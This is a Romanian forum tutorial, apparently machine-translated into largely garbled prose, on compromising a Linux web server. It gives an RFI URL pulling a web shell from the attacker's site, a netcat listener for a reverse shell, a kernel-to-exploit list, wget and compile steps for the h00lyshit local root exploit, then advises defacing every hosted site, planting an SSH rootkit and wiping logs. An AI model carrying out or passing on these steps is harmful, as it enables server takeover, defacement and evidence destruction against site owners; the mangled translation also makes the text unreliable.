...:: [] BABY CORP:: ...

Veţi avea nevoie de:
Citat:
- Site-ul vulnerabile în RFI
- Carapace pentru RFI (de exemplu, C99, r57 sau altele)
- Netcat
- Locală Root Exploit (în funcţie de versiunea de kernel şi)

Acest obiectiv tutorial este de a acorda un cont real acceptat în acţiune de înrădăcinare în Linux Server cu Safe Mod: OFF.Suppose că noi acceptăm să înceapă un website cu vulnerabilitate RFI:

Cod:

http://www.hackedsite.com/folder/index.html?page =

e poate rula coajă de exploatare de fişiere la distanţă Incluziune, după cum urmează:

Cod:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

în cazul în care este evilscript.txt carapacei noastre de web pe care le accepta deja încărcat pe site-ul nostru. (Www.mysite.com în folderul: scoici)

Dupa ce am de admitere în coajă, aborigenă de toate vom vedea adaptare a atomului în partea de sus a paginii sau prin tastarea: uname - o în linia de comandă.

Pentru a respecta vom accepta să se aplice cu backconnection la cutie. Acest lucru se poate face cu două mijloace dacă acceptăm coajă acceptabil.

Putem folosi Back-Connect alezaj de r57/c99 carapacei sau pentru a încărca o backconnector într-un folder writable

Într-o mulţime de cochilii de acolo este o afectiune backconnection după ce a încărca Ataşaţi Inapoi Carapace (sau, în plus, un carapacei perl / c). Vom analiza modul aborigenă, care este axiale carapacei (în arhetip nostru carapacei este r57).

Initial am Netcat accesibile şi acord să accepte într-o zonă de ancoraj specifice (această ancorare să accepte să fie corect deschis / transmisă în spatele unui NAT / Firewall daca vom accepta un router) cu modul după aceea:

Vom tip: 11457 în ancorare atribui (Aceasta este lipsa de ancorare pentru îndure versiunile de r57 coajă). Putem folosi şi se adaugă port.

Noi de presă în Windows Start -> Run -> si am de tip: cmd

După ce vom merge la directorul Netcat:

Citat:

cd C: \ Program Files \ Netcat
Şi am tastaţi următoarea comandă:
Citat:
NC-n-L-v-p 11456
Netcat răspunde: ascultare pe [orice] 11456 ...

În pagina axiale de r57 carapacei am de achiziţie sub meniul după aceea::: Net:: si back-conectaţi. În perioada de anchetă Anatomie vom stema noastra IP (www.cmyip.com pentru a vedea ip noastre dacă vom accepta dinamic)

În anatomie Anchorage vom pune de ancorare ca am deschis şi Netcat ascultă.

Dacă vom aplica cronicar carapacei va răspunde:

Acum Software-ul încearcă să aplice la Anchorage 11456 ...

Dacă setările noastre sunt reale Netcat ne va acorda un carapacei la server

Acum ne Wil respecte procesul de înrădăcinare.

Am accepta să achiziţionarea de către o liant scriere de ajustare pentru a descărca şi scurta mărginit Realizarea baza faptului că ne va acorda privilegii de bază în cutie. În funcţie de adaptare a atomului Linux există exploateaza modificate. Unele ori exploatează opri pentru a rula, deoarece unele cutii sunt patch-uri sau nu acceptăm permissions.List reală a exploateaza / kernel:

Citat:
2.4.17 - newlocal>, kmod, uselib24
2.4.18 - BRK>, brk2, newlocal, kmod
2.4.19 - BRK>, brk2, newlocal, kmod
2.4.20 - ptrace>, kmod, ptrace-kmod, BRK, brk2
2.4.21 - BRK>, brk2, ptrace, ptrace-kmod
2.4.22 - BRK>, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 - mremap_pte>, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 - mremap_pte>, krad, h00lyshit
2.6.5 - krad>, krad2, h00lyshit
2.6.6 - krad>, krad2, h00lyshit
2.6.7 - krad>, krad2, h00lyshit
2.6.8 - krad>, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 - krad>, krad2, h00lyshit
2.6.9-34 - r00t>, h00lyshit
2.6.10 - krad>, krad2, h00lyshit
2.6.13 - Raptor>, raptor2, h0llyshit, prctl
2.6.14 - Raptor>, raptor2, h0llyshit, prctl
2.6.15 - Raptor>, raptor2, h0llyshit, prctl
2.6.16 - Raptor>, raptor2, h0llyshit, prctl

Vom vedea cazul 2.6.8 kernel-ul Linux. Vom taxa h00lyshit exploateze.

Unele site-uri pe care le putem achiziţionarea mărginit Baza exploateaza:

milw0rm (Încercaţi să căutaţi: "kernel-ului Linux")

Alte site-uri: www.packetstormsecurity.org www.milw0rm.com | sau încercaţi googlin "puteti gasi pe toti

Putem pliant scris achiziţionarea / fişiere, tastând:
Cod:

find /-perm -2-ls

Putem folosi liant / tmp, care este un folder acceptat writable

Noi tip:
Cod:

cd / tmp

Pentru a descărca realizarea baza delimitate putem folosi o comanda de download pentru ca wget Linux.

De exemplu:
Citat:
wget http://www.yoursite.com/localroot/h00lyshit.c
http://www.yoursite.com/localroot/h00lyshit.c în cazul în care este url-ul h00lyshit.

După ce descărcarea vom accepta să scurteze realizarea (Citeste ucenicie de realizare înainte de compilare)

Pentru h00lyshit vom accepta de tipul:
Cod:

gcc h00lyshit.c-o h00lyshit

Acum vom accepta creat fişierul executabil: h00lyshit.

Comandă pentru a executa această realizare este:
Cod:

./h00lyshit

Noi percepe o carte mare pe real DJ în ajustarea la spre a alerga auspiciously şi pentru a obţine rădăcină.

Vom accepta de a actualiza o carte mare în / tmp sau în afară de dosarul writable.

Comanda este:
Cod:

dd if = / dev / urandom de = largefile count = 2M

în cazul în care largefile este numele fişierului.

Vom accepta să amâne 2-3 minute pentru crearea de carte

Dacă această comandă nu putem încerca:
Cod:

dd if = / dev / zero = / tmp / conta largefile = 102400 bs = 1024

Acum putem procced să îndure pas. Putem rula îndeplinirea de către tastând:
Cod:

largefile ./h00lyshit sau

./h00lyshit / tmp / largefile

(Dacă suntem într-un liant scriere modificat si largefile este creat în / tmp)

Dacă există erori nu sunt active (poate atom este patched sau este ceva rău cu realizarea a alerga sau fişier amplu) vom lua rădăcină

Pentru a analiza dacă ne-am root:

ID-ul sau

whoami

În cazul în care se spune baza avem root!

Acum putem şterge / cusur masa toate site-urile de server sau la birocraţie un rootkit (de exemplu, SSHDoor) şi să cedeze ssh / admiterea carapacei telnet la server.

Noi acceptăm să elimine toate jurnalele de ajustare a fi în siguranţă cu un aspirator jurnal. O mai curat acceptabile pentru acest loc de muncă este MIG Jurnal Cleaner.

Popularitate: 61% [ ? ]